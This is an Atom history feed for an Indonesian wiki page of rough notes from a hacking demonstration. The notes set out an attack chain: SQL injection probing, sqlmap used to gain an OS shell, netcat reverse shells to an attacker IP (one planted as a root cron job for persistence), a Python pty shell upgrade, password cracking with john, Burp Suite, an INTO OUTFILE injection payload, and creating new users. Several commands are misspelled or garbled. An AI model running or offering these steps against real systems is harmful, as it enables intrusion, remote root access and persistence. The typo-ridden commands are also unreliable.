<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Hacking%3A_Orek-Orekan_Demo_Hacking</id>
	<title>Hacking: Orek-Orekan Demo Hacking - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Hacking%3A_Orek-Orekan_Demo_Hacking"/>
	<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Hacking:_Orek-Orekan_Demo_Hacking&amp;action=history"/>
	<updated>2026-04-19T18:05:52Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Hacking:_Orek-Orekan_Demo_Hacking&amp;diff=38731&amp;oldid=prev</id>
		<title>Onnowpurbo: New page: netdiscover  SQL Injection - GET - HOST  GET index.php?id=1&#039; kalau ada ERROR ada celah  HOST username admin password &quot; ERROR ada celah SQL injection  Attack sqlmap -u &quot;url-yangadaerror&quot; --...</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Hacking:_Orek-Orekan_Demo_Hacking&amp;diff=38731&amp;oldid=prev"/>
		<updated>2013-11-16T02:57:35Z</updated>

		<summary type="html">&lt;p&gt;New page: netdiscover  SQL Injection - GET - HOST  GET index.php?id=1&amp;#039; kalau ada ERROR ada celah  HOST username admin password &amp;quot; ERROR ada celah SQL injection  Attack sqlmap -u &amp;quot;url-yangadaerror&amp;quot; --...&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;netdiscover&lt;br /&gt;
&lt;br /&gt;
SQL Injection&lt;br /&gt;
- GET&lt;br /&gt;
- HOST&lt;br /&gt;
&lt;br /&gt;
GET&lt;br /&gt;
index.php?id=1&amp;#039;&lt;br /&gt;
kalau ada ERROR ada celah&lt;br /&gt;
&lt;br /&gt;
HOST&lt;br /&gt;
username admin&lt;br /&gt;
password &amp;quot;&lt;br /&gt;
ERROR ada celah SQL injection&lt;br /&gt;
&lt;br /&gt;
Attack&lt;br /&gt;
sqlmap -u &amp;quot;url-yangadaerror&amp;quot; --data=&amp;quot;POSTDATA=diambildaritemperdata&amp;quot; --batch -v 3 -level=6 --risk=5&lt;br /&gt;
sqlmap -u &amp;quot;url-yangadaerror&amp;quot; --data=&amp;quot;POSTDATA=diambildaritemperdata&amp;quot; --batch -v 0 lakukanremoteshell&lt;br /&gt;
&lt;br /&gt;
OS-shell&amp;gt; id, ls&lt;br /&gt;
&lt;br /&gt;
OS=shell&amp;gt; whereis mc&lt;br /&gt;
OS-shell&amp;gt; /bin/nc.traditional ipattacker 9999 =e /bin/sh&lt;br /&gt;
&lt;br /&gt;
di komuter attacker&lt;br /&gt;
nc -lvvp 9999&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
dapat session &lt;br /&gt;
id &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pyhton -c &amp;#039;impprt pty;pty.spwwan(&amp;quot;/bin/bash/&amp;quot;)&amp;#039;&lt;br /&gt;
&lt;br /&gt;
exploit&lt;br /&gt;
&lt;br /&gt;
./john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pakai burpsuite port 8080 di localhost&lt;br /&gt;
intercept off&lt;br /&gt;
&lt;br /&gt;
authentikasi ulang dengan password yang salah&lt;br /&gt;
&lt;br /&gt;
burpsuite dapat cookies &amp;amp; session&lt;br /&gt;
200 normal&lt;br /&gt;
300 direct&lt;br /&gt;
400 error / forbidden&lt;br /&gt;
i&lt;br /&gt;
&lt;br /&gt;
* * * * * root /bin/nc.traditional ipattacker 5555 -e /bin/sh  --- ini utk memerinatahkan root exekusi nc&lt;br /&gt;
&lt;br /&gt;
nmap localhost --- check apakah port sudah di buka&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pakai burpsuite pakai Decoder &amp;gt;EDivafe AS ASCII HEX&lt;br /&gt;
copy ASCII HEX masukan ke &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pakai burpsuite pakai repeater&lt;br /&gt;
myusername=admin &amp;amp;mypassword=&amp;quot; 1=1 union elect 0x20,0x20 INTO OUTFILE * * * * * rootdst --&amp;amp;Submit=Login&lt;br /&gt;
&lt;br /&gt;
check id di OS Shell nc id dapat password root&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
useradd domas&lt;br /&gt;
adduser&lt;br /&gt;
passwd&lt;/div&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
</feed>